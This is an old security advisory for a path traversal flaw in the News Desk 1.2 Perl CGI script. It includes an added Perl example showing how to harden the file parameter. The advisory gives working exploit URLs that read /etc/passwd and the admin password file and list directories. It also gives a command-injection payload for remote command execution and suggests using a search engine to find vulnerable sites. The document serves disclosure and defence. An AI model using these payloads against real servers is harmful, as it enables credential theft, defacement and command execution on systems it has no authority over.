
Title: News Desk 1.2 CGI Vulnerability
Released by: slipy@b10z.net
Date: 3rd January 2001
Introduction:

News Desk 1.2 (newsdesk.cgi) is a news submission script written in Perl that allows someone on a remote computer to connect to the server and post news submissions without logging into the actual server. By logging into the CGI with a custom login and password (pass.txt), the admin is able to post the latest headline news to his/her website with ease.

The vendor's website is:
http://www.ibrow.com

Problem:

Adding the string "/../" to a URL allows an attacker to view any file, and also list any directory, on the server that the owner of the vulnerable httpd has permission to access.

Examples:

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/passwd
^^ = Will obviously open the passwd file, if unshadowed.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../pass.txt
^^ = Will open the password string, which can be used to log in to newsdesk.cgi and post new news or, with special variables, to upload/post HTML to the htdocs directory, possibly leading to a defacement of the webpage.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/
^^ = Will obviously list the /etc/ directory. Not all servers will list directories, but most appear to.

Note: It depends on where they install newsdesk.cgi; it is not always in a cgi-bin, so it could be installed under any path. Just go to your favorite search engine and search for newsdesk.cgi and voila. There are also some other variants of this CGI script out there; most of them are noticeable by the news.cgi?a=something&t=meow.html format. Notice the a= & t=, which are a clear giveaway of Newsdesk.

Solution:

The vendor has been contacted and will release an updated version, which is supposed to be more secure...

Special Thanks to:

zenomorph <http://www.cgisecurity.com>

Who contributed this:

Remote command execution is possible on most sites if you use the correct directory syntax; ../../../bin/ls%20/| is a working example. Many more commands are possible if you play around with it a bit, such as spawning xterms.
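
An added example, not part of the original advisory or the vendor's code: one way a Perl CGI can handle a t=-style file parameter so that neither the "../" traversal nor the trailing "|" command execution described above works. It assumes the script hands the parameter to Perl's two-argument open; resolve_template, read_template, the allow-list pattern and the template directory are hypothetical.

```perl
#!/usr/bin/perl
# Added example: hardened handling of a "t="-style file parameter.
# resolve_template(), read_template() and the allow-list are hypothetical,
# not taken from News Desk.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical path of $name inside $base, or undef if rejected.
sub resolve_template {
    my ($base, $name) = @_;
    return unless defined $name;
    # Allow-list: one plain file name. No '/', no leading '.', no '|' or spaces.
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;
    my $root = realpath($base);
    my $full = realpath(File::Spec->catfile($root, $name));
    # realpath follows symlinks, so a link that leaves $root is caught below.
    return unless defined $full && -f $full;
    return unless index($full, "$root/") == 0;
    return $full;
}

# Three-argument open fixes the mode to '<', so a trailing '|' in the name
# cannot turn the call into a command pipe as it can with two-argument open.
sub read_template {
    my ($base, $name) = @_;
    my $path = resolve_template($base, $name) or return;
    open(my $fh, '<', $path) or return;
    local $/;    # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed sample data: a temporary template directory holding one file.
my $base = tempdir(CLEANUP => 1);
open(my $out, '>', File::Spec->catfile($base, 'meow.html')) or die "open: $!";
print {$out} "<p>headline</p>\n";
close $out;

# t= values from the advisory (URL-decoded) plus one legitimate name.
for my $t ('meow.html', '../pass.txt', '../../../../etc/passwd',
           '../../../../etc/', '../../../bin/ls /|') {
    my $verdict = defined(read_template($base, $t)) ? 'served' : 'rejected';
    printf "%-24s %s\n", $t, $verdict;
}
```

The allow-list rejects the advisory's traversal and pipe strings before any file is touched; the realpath containment check is a second layer for symlinks placed inside the template directory.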



--------------------

Found By:

b10z cgi advisory.
slipy@b10z.net

Found on December 10th, 2000.
Posted to BugTraq Jan 3rd, 2001.







